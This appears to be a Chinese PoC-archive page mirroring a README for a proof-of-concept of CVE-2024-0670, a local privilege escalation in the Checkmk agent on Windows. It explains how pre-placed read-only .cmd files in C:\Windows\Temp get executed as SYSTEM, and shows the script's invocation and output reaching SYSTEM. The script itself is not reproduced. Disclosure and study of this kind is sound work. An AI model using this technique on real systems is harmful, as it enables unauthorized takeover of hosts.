关联漏洞
标题:Checkmk 安全漏洞 (CVE-2024-0670)描述:Checkmk是一个编辑器。 Checkmk存在安全漏洞,该漏洞源于存在权限提升漏洞,允许本地用户升级权限。受影响的产品和版本:Checkmk 2.2.0p23之前版本,2.1.0p40之前版本,2.0.0 (EOL)之前版本。
描述
PoC for CVE-2024-0670
介绍
# [CVE-2024-0670](https://nvd.nist.gov/vuln/detail/CVE-2024-0670) PoC
This repository provides a **Proof of Concept (PoC)** exploit for the **[CVE-2024-0670](https://nvd.nist.gov/vuln/detail/CVE-2024-0670)** vulnerability, affecting the **CheckMK Agent** on Windows systems. The vulnerability occurs when the **CheckMK Agent** creates and executes temporary files in the `C:\Windows\Temp` directory. An attacker can abuse this behavior by pre-positioning malicious files in that directory with write protection. When the agent attempts to create a temporary file that already exists as read-only, it fails to overwrite it but still executes the existing file with `SYSTEM` privileges, enabling privilege escalation.
Advisory Reference: [SEC Consult - Local Privilege Escalation via writable files in Checkmk Agent](https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/)
---
### :warning: DISCLAIMER
This project is intended **for educational, research, and authorized security testing purposes only**.
**Do not use this code on systems you do not own or have explicit permission to test.**
The author is **not responsible** for any damage or misuse.
---
### Usage
```
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
```
### Example
```
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer...
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system
```
文件快照
[4.0K] /data/pocs/e5dec4ce69165da0189a0ab2c6594b9041c5964c
├── [1.8K] CVE-2024-0670.ps1
└── [2.0K] README.md
1 directory, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。